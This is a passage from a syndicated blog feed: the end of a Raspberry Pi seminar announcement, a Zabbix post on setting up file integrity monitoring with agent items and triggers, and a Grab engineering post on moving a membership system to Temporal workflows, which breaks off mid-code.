Attendees of our 2024 series told us that they valued that the talks “explore a relevant topic in an informative way”, the “enthusiasm and inspiration”, and particularly the small-group discussions because they “are always filled with interesting and varied ideas and help to spark my own thoughts”.

The seminars usually take place on Zoom on the first Tuesday of each month at 17:00–18:30 GMT / 12:00–13:30 ET / 9:00–10:30 PT / 18:00–19:30 CET. 

You can find out more about each seminar and the speakers on our upcoming seminar page. And if you are unable to attend one of our talks, you can watch them from our previous seminar page, where you will also find an archive of all of our previous seminars dating back to 2020.

How to sign up

To attend the seminars, please register here. You will receive an email with the link to join our next Zoom call. Once signed up, you will automatically be notified of upcoming seminars. You can unsubscribe from our seminar notifications at any time.

We hope to see you at a seminar soon!

The post How can we teach students about AI and data science? Join our 2025 seminar series to learn more about the topic appeared first on Raspberry Pi Foundation.

File Integrity Monitoring with Zabbix

Post Syndicated from Paulo R. Deolindo Jr. original https://blog.zabbix.com/file-integrity-monitoring-with-zabbix/29460/

We have often seen Zabbix used as a simple tool for monitoring network assets as well as Information and Communication Technology (ICT) infrastructure. While this concept is not incorrect, it is equally important to understand that with the advancement of Zabbix versions, more and more functionalities have been made available for other types of monitoring, enabling advanced data analysis and stunning visualizations through new and modern widgets in the frontend layer.

In this short blog post, we will explore some of the existing yet under-discussed features of Zabbix that contribute to the maturity of the cybersecurity discipline within organizations — a topic that is becoming increasingly critical in the corporate environment.

FIM – File Integrity Monitoring

FIM is a very common concept among information security tools, specifically in tools like SIEM/XDR (Security Information and Event Management/Extended Detection and Response). The name says a lot about what it does, and while some tools highlight this feature as one of their main functionalities, it is also available to those who use Zabbix, just not explicitly labeled under this name.
Here, we will approach FIM as a concept rather than just a functionality. This is because we aim to achieve a result, not merely have a menu with a name to claim compliance while using our tool. In fact, the outcome needs to be more important than mere “marketing.”

What should we expect from FIM?

Imagine that your servers have certain directories and/or files so critical that you cannot afford to neglect monitoring them for changes, insertions, or deletions. Additionally, these files may have owners and properties that must not be altered – otherwise, the systems that depend on them might lose the ability to read or execute their functions. This, at a minimum, is what we expect from FIM as a functionality.
To illustrate this a bit further, consider a database service like MariaDB:

# ls -lR /etc/mysql/
/etc/mysql/:
total 24
drwxr-xr-x 2 root root 4096 Jun 25 18:40 conf.d
-rwxr-xr-x 1 root root 1740 Nov 30 2023 debian-start
-rw------- 1 root root 544 Jun 25 18:43 debian.cnf
-rw-r--r-- 1 root root 1126 Nov 30 2023 mariadb.cnf
drwxr-xr-x 2 root root 4096 Sep 30 16:36 mariadb.conf.d
lrwxrwxrwx 1 root root 24 Oct 20 2020 my.cnf -> /etc/alternatives/my.cnf
-rw-r--r-- 1 root root 839 Oct 20 2020 my.cnf.fallback

/etc/mysql/conf.d:
total 8
-rw-r--r-- 1 root root 8 Oct 20 2020 mysql.cnf
-rw-r--r-- 1 root root 55 Oct 20 2020 mysqldump.cnf

/etc/mysql/mariadb.conf.d:
total 40
-rw-r--r-- 1 root root 575 Nov 30 2023 50-client.cnf
-rw-r--r-- 1 root root 231 Nov 30 2023 50-mysql-clients.cnf
-rw-r--r-- 1 root root 927 Nov 30 2023 50-mysqld_safe.cnf
-rw-r--r-- 1 root root 3795 Sep 30 16:36 50-server.cnf
-rw-r--r-- 1 root root 570 Nov 30 2023 60-galera.cnf
-rw-r--r-- 1 root root 76 Nov 8 2023 provider_bzip2.cnf
-rw-r--r-- 1 root root 72 Nov 8 2023 provider_lz4.cnf
-rw-r--r-- 1 root root 74 Nov 8 2023 provider_lzma.cnf
-rw-r--r-- 1 root root 72 Nov 8 2023 provider_lzo.cnf
-rw-r--r-- 1 root root 78 Nov 8 2023 provider_snappy.cnf

All the files, directories, and subdirectories listed above have already been configured, and the system (whatever it may be) is functioning perfectly. However, if someone suddenly decides to alter a configuration in the file /etc/mysql/mariadb.conf.d/50-server.cnf, this could be disastrous for the service. Regardless, the important thing to do is to monitor this scope and notify the relevant stakeholders so that an appropriate analysis can be conducted.

Zabbix can help with that. Let’s see how.

Zabbix and File Integrity Monitoring functions

Consider that the Zabbix agent is installed on the server to be monitored:

vfs.dir.count[/etc/mysql]

With this key, we can count the objects present within the /etc/mysql directory. We can then create a trigger that fires whenever the count differs from the previously collected value, for example because someone deleted or added a file or directory in this location.

vfs.dir.size[/etc/mysql]

With this key, we can determine the total size in bytes used by the directory and the configuration files in it. We can then create a trigger that activates when this size changes, which indicates that a file was added, deleted, or changed in size.

vfs.file.exists[/etc/mysql/mariadb.conf.d/50-server.cnf]

Among several important files, we may have a greater interest in some configuration files, and we can validate their existence by creating a trigger that activates when such a file ceases to exist. This will clearly indicate that something important has disappeared.

In this case, the value “1” represents “OK” for the existence of the file.

vfs.file.cksum[/etc/mysql/mariadb.conf.d/50-server.cnf,sha256]

In addition to verifying the existence of the configuration file we consider important, we need to be informed if anything in it changes. This key handles that by generating a hash in a variety of possible formats, allowing a trigger to be activated in case of a hash change, which would reflect a file modification (unfortunately, we won’t know what exactly was altered).
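As a rough illustration of what a checksum comparison detects, here is a standalone Python sketch. It is not how the Zabbix agent is implemented; the helper name `sha256_of` and the temporary file standing in for the configuration file are assumptions made for the example. Two successive readings of a file's SHA-256 are compared, much as a trigger would compare the last two item values:

```python
import hashlib
import os
import tempfile


def sha256_of(path: str) -> str:
    """Return the hex SHA-256 digest of a file, read in chunks."""
    digest = hashlib.sha256()
    with open(path, "rb") as handle:
        for chunk in iter(lambda: handle.read(65536), b""):
            digest.update(chunk)
    return digest.hexdigest()


# Hypothetical stand-in for a monitored configuration file.
with tempfile.NamedTemporaryFile("w", suffix=".cnf", delete=False) as tmp:
    tmp.write("max_connections = 100\n")
    config_path = tmp.name

previous_hash = sha256_of(config_path)

# Simulate someone editing the file between two collections.
with open(config_path, "a") as handle:
    handle.write("# edited\n")

last_hash = sha256_of(config_path)
changed = last_hash != previous_hash  # the condition a trigger would alert on
os.remove(config_path)
print("file changed:", changed)
```

Even a one-line comment changes the digest, which is why the hash tells us that something changed but not what.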

vfs.file.regmatch[/etc/mysql/mariadb.conf.d/50-server.cnf,^max_connections\s+=\s+(\d+)]

We might have a specific parameter of interest – for example, the maximum number of connections allowed to the database. Monitoring this is important because if the configuration is set to the default value, it means that no “tuning” has been applied to the database. Alternatively, it could mean that someone simply deleted or commented out this line, causing it to be ignored by the system. Therefore, verifying whether the parameter exists and is properly configured is crucial.

In this case, the value “1” indicates that the regular expression was successfully found, meaning that the configuration or parameter we need to exist is indeed present.

vfs.file.regexp[/etc/mysql/mariadb.conf.d/50-server.cnf,^max_connections\s+=\s+(\d+),,,,\1]

Beyond verifying the existence and integrity of the file, it is also possible to determine what was changed within it. However, we would need to specify the configuration of interest using a regular expression. For example, considering that the maximum number of connections allowed by the database system is “x,” we can be alerted by a trigger if it changes to “y,” “z,” or any other value different from “x.” This setup allows us to monitor the parameter of interest with precision. This logic can be applied to any other parameter you consider important. Of course, there is another way to automate this process, but we will not cover that automation here.

In this case, the parameter defining the maximum number of connections is not only present, but we also know the exact number of connections. This way, we will have a history of the applied parameterization in case it is changed at any point.
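The difference between the two regular-expression keys can be tried out offline. The following Python sketch reuses the pattern from the item keys above on a made-up configuration text; the function names `regmatch` and `regexp_group` are illustrative only, and Python's `re` module is used here as an approximation of the agent's regular-expression engine:

```python
import re
from typing import Optional

# Same pattern as in the item keys above; the sample config text is made up.
PATTERN = re.compile(r"^max_connections\s+=\s+(\d+)")

SAMPLE_CONFIG = """[mysqld]
#max_connections = 50
max_connections  = 250
bind-address = 127.0.0.1
"""


def regmatch(text: str) -> int:
    """Mimic the 1/0 style result: 1 if any line matches, else 0."""
    return int(any(PATTERN.search(line) for line in text.splitlines()))


def regexp_group(text: str) -> Optional[str]:
    """Mimic the \\1 output: first capture group of the first matching line."""
    for line in text.splitlines():
        match = PATTERN.search(line)
        if match:
            return match.group(1)
    return None  # this sketch returns None when nothing matches


print(regmatch(SAMPLE_CONFIG), regexp_group(SAMPLE_CONFIG))
```

Note that the commented-out line does not match because the pattern is anchored with `^`, so a parameter that was commented out is reported as missing.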

vfs.file.owner[/etc/mysql/mariadb.conf.d/50-server.cnf]

vfs.file.owner[/etc/mysql/mariadb.conf.d/50-server.cnf,group]

The two keys above allow us to determine the owner of a file and (in the case of a Linux system) the owning group. We can also choose to monitor the user’s name or their UID in the system. Naturally, a trigger can be activated to alert us in case of an ownership change, indicating that someone might be “taking over” an important file in the system.

vfs.file.permissions[/etc/mysql/mariadb.conf.d/50-server.cnf]

The key above allows us to determine a file’s permissions—read, write, read and write, execution, or a special permission bit. Naturally, a trigger can be activated to alert us if there is any permission change in the file.

vfs.file.attr[/etc/mysql/mariadb.conf.d/50-server.cnf]

The key above does not exist by default. It was created with a UserParameter, which is a customization for verifying a command that, in this case, checks the attributes of a specific file. Consider the following command executed directly in your system’s terminal:

# lsattr /etc/mysql/mariadb.conf.d/50-server.cnf
--------------e------- /etc/mysql/mariadb.conf.d/50-server.cnf

What interests us are the attributes:

--------------e-------

If someone who invades the system modifies the attribute of a file (for example) using this command…

# chattr +A /etc/mysql/mariadb.conf.d/50-server.cnf
# lsattr /etc/mysql/mariadb.conf.d/50-server.cnf
-------A------e------- /etc/mysql/mariadb.conf.d/50-server.cnf

…it could mean that someone does not want the system to log when this file was accessed (refer to the chattr command manual). Additionally, any other attribute can be added or removed, which poses a risk to the system because these attributes can alter how files are accessed, stored on disk, and later read. Therefore, we can create a UserParameter as follows:

# cd /etc/zabbix/zabbix_agent2.d/
# echo "UserParameter=vfs.file.attr[*],lsattr \$1 | cut -d\" \" -f1" > attr.conf
# zabbix_agent2 -R userparameter_reload

Finally, we can test the reading of attributes directly from the terminal:

# zabbix_agent2 -t vfs.file.attr[/etc/mysql/mariadb.conf.d/50-server.cnf]
vfs.file.attr[/etc/mysql/mariadb.conf.d/50-server.cnf][s|-------A------e-------]

You can also try this now through the frontend.

When creating the item, don’t forget to create the trigger that should be activated in case there is a change in the attribute of a file, whatever it may be.

Paying attention to file access and modification times

To delve a bit deeper into the concept of FIM, we should ask ourselves if we are monitoring file access and modifications concerning their timestamps. In a way, if we have implemented everything proposed above, the answer is yes.

That said, there is an easier way to keep track of all the things we’ve discussed. It involves using this key:

vfs.dir.get[/etc/mysql]

When creating an item with this key, we will recursively obtain all the objects in the directory, such as subdirectories and files. The output is in JSON format, which allows us to create LLD (Low-level Discovery) rules to automate FIM. Below is a small snippet of the monitoring output:

{
"basename": "mariadb.cnf",
"pathname": "/etc/mysql/mariadb.cnf",
"dirname": "/etc/mysql",
"type": "file",
"user": "root",
"group": "root",
"permissions": "0644",
"uid": 0,
"gid": 0,
"size": 1126,
"time": {
"access": "2024-11-30T23:01:01-0300",
"modify": "2023-11-30T01:42:37-0300",
"change": "2024-06-25T18:41:01-0300"
},
"timestamp": {
"access": 1733018461,
"modify": 1701319357,
"change": 1719351661
}
...

Considering that the output includes all objects from the main directory, this would be the most sensible approach to configure our FIM. However, it is necessary to create the LLD and prototypes. We will not cover this in detail in this article, but this is the path I recommend you follow.
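To show why this single JSON output is enough for FIM, here is a small Python sketch that compares two collections and reports what was added, removed, or changed. It runs outside Zabbix; the two snapshots are made up, trimmed to a few of the fields shown above, and assume that each collection yields a JSON array of such objects. The choice of fields in `fingerprint` is ours, not something prescribed by Zabbix:

```python
import json

# Two made-up snapshots, trimmed to a few of the fields shown above.
# Assumption: each collection yields a JSON array of such objects.
BEFORE = json.loads("""
[
  {"pathname": "/etc/mysql/mariadb.cnf", "user": "root", "permissions": "0644",
   "size": 1126, "timestamp": {"modify": 1701319357}},
  {"pathname": "/etc/mysql/debian.cnf", "user": "root", "permissions": "0600",
   "size": 544, "timestamp": {"modify": 1719351780}}
]
""")
AFTER = json.loads("""
[
  {"pathname": "/etc/mysql/mariadb.cnf", "user": "root", "permissions": "0666",
   "size": 1126, "timestamp": {"modify": 1701319357}},
  {"pathname": "/etc/mysql/extra.cnf", "user": "root", "permissions": "0644",
   "size": 12, "timestamp": {"modify": 1733018461}}
]
""")


def fingerprint(entry):
    """Fields whose change we treat as an integrity event (our choice)."""
    return (entry["user"], entry["permissions"], entry["size"],
            entry["timestamp"]["modify"])


def diff_snapshots(before, after):
    """Return sorted lists of added, removed and changed pathnames."""
    old = {e["pathname"]: fingerprint(e) for e in before}
    new = {e["pathname"]: fingerprint(e) for e in after}
    return {
        "added": sorted(new.keys() - old.keys()),
        "removed": sorted(old.keys() - new.keys()),
        "changed": sorted(p for p in old.keys() & new.keys() if old[p] != new[p]),
    }


report = diff_snapshots(BEFORE, AFTER)
print(report)
```

In Zabbix itself the same effect is reached with LLD and item prototypes per discovered object, so that each attribute gets its own history and trigger.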

Below is a “blueprint” for an LLD to create automated File Integrity Monitoring:

The “Master item”:

The “Dependent rule”:

The LLD Macro:

The item prototypes:

Below are the components of a trigger prototype (I created just one to symbolize a type of alert for file modification):

Name: Object: {#BASENAME} just changed

Event name: Object: {#BASENAME} just changed. Last hash: {ITEM.VALUE} The previous one: {?last(/MySQLDB/vfs.file.cksum["{#PATHNAME}",sha256],#2)}

Severity: Warning

Expression: last(/MySQLDB/vfs.file.cksum["{#PATHNAME}",sha256],#1)<>last(/MySQLDB/vfs.file.cksum["{#PATHNAME}",sha256],#2)

And then, some results:

Conclusion

The implementation of a robust File Integrity Monitoring system helps to ensure the security of IT infrastructure. Detecting unauthorized changes in critical files helps prevent attacks, identify security breaches, and ensure the integrity and availability of systems. With Zabbix, we have an effective solution to implement FIM, enabling process automation and the real-time visualization of changes. This monitoring not only reinforces protection against intrusions but also facilitates auditing and compliance with regulatory standards.

The main benefits of integrating File Integrity Monitoring with Zabbix include:

1. Early detection of changes in critical files, enabling quick responses.
2. Enhanced compliance with security regulations and internal policies.
3. Protection against malware and ransomware by identifying changes in essential files.
4. Ease of auditing with automated reports and modification histories.
5. Greater visibility and control over the integrity of data and systems in real time.
6. Operational efficiency through the automation of alerts and reports.
7. Improved proactive security, helping prevent attacks before they become critical.

By using Zabbix, organizations can strengthen their security posture and optimize risk management, ensuring that any unauthorized changes are detected and promptly corrected.

The post File Integrity Monitoring with Zabbix appeared first on Zabbix Blog.

Turbocharging GrabUnlimited with Temporal

Post Syndicated from Grab Tech original https://engineering.grab.com/turbocharging-grabunlimited-with-temporal

Welcome to the behind-the-scenes story of GrabUnlimited, Grab’s flagship membership program. We undertook the mammoth task of migrating from our legacy system to a Temporal [1] workflow-based system, enhancing our ability to handle millions of subscribers with increased efficiency and resilience. The result? A whopping 80% reduction in open production incidents, and most importantly – an improved membership experience for our users. In this first part of the series, you will learn how to design a robust and scalable membership system as we delve into our own experience building one.

What is GrabUnlimited?

The idea behind GrabUnlimited is pretty simple: you pay a monthly fee, you get monthly benefits as a member (e.g. a discounted food delivery fee). A membership system plays a key role in enhancing user experience by giving users more value for money, but also by building loyalty, making Grab their go-to app for everyday needs. However, as this program grew and evolved, it brought along unique challenges and opportunities.

With the initial triumph and significant surge in subscriber count by over 1000% from January 2022 to June 2023 – which we were super proud of! – the architecture that supported GrabUnlimited was starting to show signs of strain. Common subscriber concerns such as not receiving their membership benefits, along with developer issues marked by an increase in service outages highlighted the system’s low resiliency. The culprit? A backend service that, while functional, was not built to efficiently manage the complexities of a rapidly scaling membership model.

Deep dive into our previous system design

As engineers, we know that deciding to migrate any system to a new one is like changing the engine of a running car. It requires meticulous evaluation of the existing systems, a deep dive into the issues and their root causes, and a thorough analysis of potential solutions and their trade-offs.

How was GrabUnlimited designed?

Initially, GrabUnlimited systems were designed for an experiment and not a full-fledged regional product. The idea was to try it out as a minimum viable product over a restricted segment of a few hundred thousand users. Let’s first have a look at how the membership program works.

Figure 1. GrabUnlimited life of a membership flowchart.

Under the hood, our membership system relies on two main flows:

  • Membership purchase: The user enrols for a certain duration (e.g. 3 months), completes the payment through our Payment service, and receives benefits via our Reward service.
  • Membership renewal: A daily cron job [2] checks which memberships need renewal, processes the payment, and delivers the benefits.

We employed a state machine [3] approach to break down the membership process into smaller chunks called state handlers. For instance, a membership might transition through ‘Init’, ‘Charged’, ‘Rewarded’, and ‘Active’ states. To operate these states, we used Amazon’s Simple Queue Service (SQS). SQS acts as a manager, delegating state handlers to workers (our service) and monitoring the status of the state handler. If a worker fails to complete a task, SQS reassigns the task to another worker, ensuring no task is lost. The load is also spread across multiple workers, helping with scalability.
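The state-handler idea can be sketched in a few lines of Python. This is a simplified, in-process illustration only: the state names come from the text above, but the `NEXT_STATE` table, the handler functions, and the absence of any queue are assumptions of the sketch, not a description of the original service.

```python
from enum import Enum


class State(Enum):
    INIT = "Init"
    CHARGED = "Charged"
    REWARDED = "Rewarded"
    ACTIVE = "Active"


# Allowed transitions for the happy path (assumed linear for this sketch).
NEXT_STATE = {
    State.INIT: State.CHARGED,
    State.CHARGED: State.REWARDED,
    State.REWARDED: State.ACTIVE,
}


def run_membership(handlers, state=State.INIT):
    """Run each state's handler, then move to the next state."""
    history = [state]
    while state in NEXT_STATE:
        handlers[state]()          # e.g. charge the user, award benefits
        state = NEXT_STATE[state]
        history.append(state)
    return history


calls = []
handlers = {
    State.INIT: lambda: calls.append("charge payment"),
    State.CHARGED: lambda: calls.append("award benefits"),
    State.REWARDED: lambda: calls.append("activate membership"),
}
history = run_membership(handlers)
print([s.value for s in history], calls)
```

In the real system each handler invocation would be a queued task picked up by a worker, which is where retries and locking come in.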

To safeguard our system against duplicate tasks, such as charging the user twice, a worker that takes up a task acquires a Redis lock [4] with a time-to-live (TTL) of five minutes, which prevents any other worker from picking up the same task. If the worker fails or crashes, the lock expires and another worker can pick up the job.

So far, so good.

Figure 2. GrabUnlimited previous system design overview.

With our success came many challenges

As our subscriber base grew, we experienced an increase in system outages. To address this, we scrutinised metrics like the number of support tickets and gauged the toll on our engineering team. This included the time spent patching up issues and the opportunity cost of not developing new features or improvements.

From our subscribers’ point of view, we saw a steady increase in reported incidents.

  • Users were blocked because their membership status was corrupted in our database.
  • Memberships were not automatically renewed, or users were not able to resubscribe.
  • Users were not receiving their benefits after renewing their membership.

From the engineering team’s perspective, we were dedicating one engineer every week to battle these incidents full time. The on-call engineers were not only tasked with manually fixing all customer reports but were also swamped with frequent system alerts. This situation had three detrimental impacts on our team:

  • We were constantly putting out fires instead of addressing the root causes.
  • We were spending resources that could have been used to enhance our customers’ experience.
  • Our team’s motivation and confidence were taking a big hit.

Finding the architectural culprit

The first step was to clearly identify and understand the issues within our systems. We looked at the frequency of failures and their root cause. From there, we were able to detect recurring patterns, which led us to four major issues in our architecture.

Scalability

Our system’s cron job, which retrieved from our database all memberships due for renewal that day, became slower and more resource-intensive as the number of members increased. Despite our attempt to alleviate high database usage by dividing the process into multiple batches and running several cron jobs, we still experienced significant surges each time a cron job ran. Our only viable remedy was vertical scaling [5] of the database. In other words, we had a serious bottleneck in our system.

Figure 3. Database queries per second during membership renewals at night.

Concurrency [6]

Picture this – A user tries to cancel their membership in the middle of the auto-renewal process, and voila, we have what we call a “zombie” state where the membership is both cancelled and renewed. This situation happens due to the limitations of our 5-minute Redis lock. If the renewal process holding the lock doesn’t complete within the timeout, the lock is released, enabling the cancel process to obtain the lock and run concurrently.
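The race described above can be reproduced with a toy lock. The sketch below uses an in-memory class with an explicit clock instead of real Redis, and the timings (120 s, 301 s) are made up; only the five-minute TTL comes from the text.

```python
class TtlLock:
    """In-memory stand-in for a lock with a time-to-live (not real Redis)."""

    def __init__(self, ttl_seconds):
        self.ttl = ttl_seconds
        self.owner = None
        self.expires_at = 0.0

    def acquire(self, owner, now):
        # The lock is free if nobody holds it or the holder's TTL has passed.
        if self.owner is not None and now < self.expires_at:
            return False
        self.owner = owner
        self.expires_at = now + self.ttl
        return True


lock = TtlLock(ttl_seconds=300)
events = []

# t=0s: the renewal process takes the lock and starts a slow upstream call.
renew_started = lock.acquire("renew", now=0)
events.append("renew:start")

# t=120s: a cancel request arrives and is correctly blocked.
cancel_early = lock.acquire("cancel", now=120)

# t=301s: renewal is still running, but its lock has silently expired.
cancel_late = lock.acquire("cancel", now=301)
if cancel_late:
    events.append("cancel:done")

# Renewal finishes afterwards, unaware that it lost the lock.
events.append("renew:done")
print(events)
```

Both processes complete against the same membership, which is exactly the cancelled-and-renewed “zombie” state.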

Resiliency [7]

What happens when the Rewards service faces an outage? The user buys a membership but doesn’t receive the rewards. It’s like throwing a party but the guests never arrive. We had three issues here:

  • When upstream services had an outage, we relied on SQS’s maximum number of retries without exponential backoff [8], which could overload services that were still recovering.
  • Our cron job being housed within the service itself was susceptible to interruptions during outages or service restarts.
  • Over time, the logic to transition between states in our state machine became complex and multi-responsibility as more states were added. This made our retry mechanism unreliable due to potential risks of double charging or double awarding users. Which leads us to our fourth culprit.

Idempotency [9]

Even when some steps could be retried, our system lacked idempotency guarantees – a safety net to ensure that a step could be repeated without unintended side effects. Although our critical upstream systems like Payments and Rewards support idempotency via idempotency keys, our service wasn’t originally designed with this in mind.

  • Users could be stuck in a state where the payment succeeded but they didn’t receive their benefits or received them twice, requiring manual intervention from engineers.
  • We were not able to auto-retry membership renewals if the cron job, database, or any service had an outage.

Figure 4. Example of an idempotency issue in our old system design. If a single task fails in a state handler, the whole step is retried, which could lead to double awarding.

For example, consider a state handler “BenefitsAwarding” that follows these steps:

  1. Generate an idempotency key.
  2. Call the Reward service to award the first set of benefits to the subscriber using the key.
  3. Call the Reward service to award the second set of benefits to the subscriber using the key.

If step 3 fails due to an outage and the step is retried and re-queued in SQS, it restarts from step 1. This generates a new idempotency key, so the Reward service does not recognise the retry and awards the first set of benefits twice. One way to fix this within that design would have been to substantially increase the number of states in our SQS state machine, isolating tasks further rather than handling too much logic in a single state handler. However, that would mean having hundreds of states, making the whole process difficult to maintain.
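The double-award scenario is easy to reproduce in a toy model. In the Python sketch below, `RewardService` is a made-up stand-in that deduplicates on the pair (key, benefit), and the “stable key” variant derives the key from the membership and a hypothetical billing period. That variant is shown only to illustrate what idempotency buys; it is one common mitigation and not necessarily the approach Grab took.

```python
import uuid


class RewardService:
    """Toy stand-in for an upstream service that deduplicates by key."""

    def __init__(self):
        self.seen = set()
        self.awarded = []

    def award(self, key, benefit, fail=False):
        if fail:
            raise RuntimeError("simulated outage")
        if (key, benefit) in self.seen:
            return  # same request seen before: do nothing
        self.seen.add((key, benefit))
        self.awarded.append(benefit)


def benefits_awarding(service, membership_id, attempt, stable_key):
    # Step 1: generate the idempotency key.
    if stable_key:
        key = f"{membership_id}:2024-01"  # hypothetical: derived from the billing period
    else:
        key = uuid.uuid4().hex  # fresh key on every (re)run of the handler
    service.award(key, "benefits-1")                       # step 2
    service.award(key, "benefits-2", fail=(attempt == 1))  # step 3 fails once


def run_with_retry(stable_key):
    service = RewardService()
    for attempt in (1, 2):
        try:
            benefits_awarding(service, "member-42", attempt, stable_key)
            break
        except RuntimeError:
            continue  # the whole handler is re-queued and restarts at step 1
    return service.awarded


print(run_with_retry(stable_key=False))
print(run_with_retry(stable_key=True))
```

With a fresh key per run the first set of benefits is awarded twice; with a key that survives the retry, the upstream deduplication works as intended.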

Ultimately, most incidents traced back to one fundamental issue: Our systems were relying on a sequential process that couldn’t be easily replayed if any incident or disturbance happened during execution. We were placing all our bets on the happy path, a risky gamble indeed.

The Solution: Migrating our system to Temporal

Armed with a clear understanding of the problems and their impacts, we set out to explore potential solutions. This journey led us to consider refactoring our existing system or migrating to a new architecture that another team introduced to us: Temporal.

Enter Temporal

Temporal is an open-source workflow orchestration engine. Think of it as a more robust and battle-tested implementation of our previous SQS architecture. It’s designed to run millions of workflows concurrently and can recover/resume the state of a workflow execution at the exact point of failure even in the event of an outage. It has features like infinite retries, exponential backoff, rate limiting, and observability out of the box. This sounded exactly like what we needed! By using Temporal, we could offload the complexity of managing state transitions, retries, and task concurrency, allowing us to focus on our core business logic.

To make the right decision, we meticulously assessed our options against the following criteria: scalability [10], reliability [11], resiliency [12], performance, development effort, cost, security, flexibility [13], and testability [14]. We realised that most of what we needed to build to compensate for our system design gaps was already built into Temporal. Let’s take a sneak peek at how the architecture looks and how it addresses all four major culprits we discussed.

Figure 5. GrabUnlimited new system design architecture.

Fixing our architecture culprits

Scalability

Let’s start with the easiest fix. Remember our old cron job for membership renewals? We replaced it with a Timer, which allows a workflow to sleep and automatically wake up. Instead of being renewed in batches, memberships are now renewed throughout the day, based on the hour and minute at which each user subscribed. What does this mean for us? We no longer need to fetch memberships from our database to trigger renewals. The workflow resumes at the due date to process the renewal, eliminating the database as a bottleneck.
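To illustrate the timer-based approach, here is a minimal sketch of how a per-membership wake-up time could be derived from the subscription timestamp alone, with no database scan. It uses only the Python standard library rather than the Temporal SDK, and the 30-day period and the function names are assumptions made for the example.

```python
from datetime import datetime, timedelta, timezone


def next_renewal(subscribed_at, now, period_days=30):
    """First renewal instant after `now`, on the subscription's own hour and minute.

    The 30-day period is an assumed billing cycle for illustration.
    """
    period = timedelta(days=period_days)
    elapsed_periods = (now - subscribed_at) // period
    return subscribed_at + (elapsed_periods + 1) * period


def sleep_duration(subscribed_at, now, period_days=30):
    """How long a workflow would sleep before processing the next renewal."""
    return next_renewal(subscribed_at, now, period_days) - now


subscribed = datetime(2024, 1, 1, 9, 30, tzinfo=timezone.utc)
now = datetime(2024, 1, 15, 0, 0, tzinfo=timezone.utc)
print(next_renewal(subscribed, now))    # 2024-01-31 09:30:00+00:00
print(sleep_duration(subscribed, now))  # 16 days, 9:30:00
```

Since each membership wakes at its own minute, renewals spread across the day instead of arriving as one batch.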

Figure 6. Total queries per second (QPS) on database before and after the migration to Temporal.

Concurrency

Our legacy Redis lock mechanism was clearly not enough. With Temporal, we have alternative ways to avoid race conditions. What happens if a user tries to cancel while the membership renewal workflow is being triggered? Temporal allows us to assign the same workflow ID to multiple workflows running mutually exclusive operations, ensuring only one operation runs at a time. We assigned the same workflow ID to both the cancellation and renewal workflows: either cancellation happens first, removing the need to renew the consumer’s membership, or renewal takes the lead and cancellation happens only afterwards.
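The uniqueness rule can be pictured with a small in-memory model. This is a sketch only: `WorkflowRegistry` is a hypothetical class that imitates the "one open execution per workflow ID" behaviour, not the Temporal SDK, and the membership ID is made up.

```python
class WorkflowRegistry:
    """Hypothetical model: at most one open execution per workflow ID."""

    def __init__(self):
        self._open = set()

    def start(self, workflow_id):
        if workflow_id in self._open:
            raise RuntimeError(f"workflow {workflow_id!r} is already running")
        self._open.add(workflow_id)

    def complete(self, workflow_id):
        self._open.discard(workflow_id)

    def is_running(self, workflow_id):
        return workflow_id in self._open


registry = WorkflowRegistry()
membership_id = "membership-123"   # shared by renewal and cancellation

registry.start(membership_id)      # renewal begins
try:
    registry.start(membership_id)  # cancellation arrives mid-renewal
    cancellation_started = True
except RuntimeError:
    cancellation_started = False   # rejected while renewal is open

registry.complete(membership_id)   # renewal finishes
registry.start(membership_id)      # cancellation can now run
```

Sharing one ID turns the two operations into a queue of one, which is the property the Redis lock could not reliably provide.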

Figure 7. Total corrupted membership states (zombies) manually handled by engineers significantly decreased during our migration which started in February.

Resiliency

Out of the box, Temporal allowed us to put in place a few key resilience mechanisms, such as exponential backoff and infinite retries, whose absence was a key gap in our previous SQS architecture. We didn’t have to implement these mechanisms ourselves, and when calling key upstream services like Payment, we could set our retry policies precisely, without overwhelming the service during an outage on their end.
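As a rough illustration of what an exponential backoff policy produces, the sketch below computes the wait before each retry from an initial interval, a multiplier, and a cap. The function name and the numbers are assumptions for the example, not our actual retry policy.

```python
def backoff_intervals(initial=1.0, coefficient=2.0, maximum=60.0, attempts=8):
    """Seconds to wait before each retry: initial * coefficient**n, capped at maximum."""
    return [min(initial * coefficient ** n, maximum) for n in range(attempts)]


print(backoff_intervals())
# [1.0, 2.0, 4.0, 8.0, 16.0, 32.0, 60.0, 60.0]
```

The cap keeps retries going at a steady, gentle rate during a long outage instead of either hammering the upstream service or waiting indefinitely longer.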

Idempotency

Remember our fourth culprit from above? Our state handlers with SQS were performing too many tasks simultaneously, which made it risky to trust the retry process. This multi-responsibility nature introduced significant risks, including potential database corruption, double charging, and double awarding of benefits. Further breaking down these steps would result in hundreds of intermediary steps, each requiring careful maintenance and correct sequencing. With Temporal, you can imagine a membership as an ever-running workflow consisting of a sequence of steps that are automatically managed and retried in case of failures.

While this approach didn’t directly resolve idempotency issues, it made the system and the code more readable and allowed us to design steps with single responsibilities. This, in turn, made it simpler for us to develop and ensure these steps were idempotent.

Let’s take a look at our previous example with Temporal.

Figure 8. Temporal workflow: If a single task fails, only that task is retried.

Let’s consider the same use case where a member needs to receive their benefits. The tasks remain the same except we don’t need to persist the idempotency key as it will be in the Temporal workflow state instead.

  1. Generate idempotency keys.
  2. Call the Reward service to award the first set of benefits to the subscriber using the key abc1.
  3. Call the Reward service to award the second set of benefits to the subscriber using the second key xyz1.

If the “AssignBenefits2” step fails and the process is retried by Temporal, it restarts directly from that step, preventing the double awarding we were experiencing with SQS. Thanks to this approach, we greatly improved idempotency and resiliency in our system, which also led to a marked decrease in user-reported incidents.
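The step-level retry can be sketched as follows. This is a simplified model in plain Python, not Temporal code: the `state` dictionary stands in for the workflow state, `FakeRewardService` and `run_workflow` are hypothetical, and the keys abc1 and xyz1 are the ones from the example above.

```python
class FakeRewardService:
    """Hypothetical stand-in that deduplicates by idempotency key."""

    def __init__(self):
        self.seen_keys = set()
        self.awards = []
        self.outage = True     # the first Benefits2 call fails once

    def award(self, benefit, key):
        if benefit == "Benefits2" and self.outage:
            self.outage = False
            raise ConnectionError("simulated outage")
        if key in self.seen_keys:
            return             # duplicate request, ignored
        self.seen_keys.add(key)
        self.awards.append(benefit)


def run_workflow(rewards, max_attempts=3):
    # Keys are generated once and kept with the workflow state,
    # so a retry of one step reuses the same key.
    state = {"keys": {"Benefits1": "abc1", "Benefits2": "xyz1"}, "done": []}
    for benefit in ("Benefits1", "Benefits2"):
        for _ in range(max_attempts):
            try:
                rewards.award(benefit, state["keys"][benefit])
                state["done"].append(benefit)
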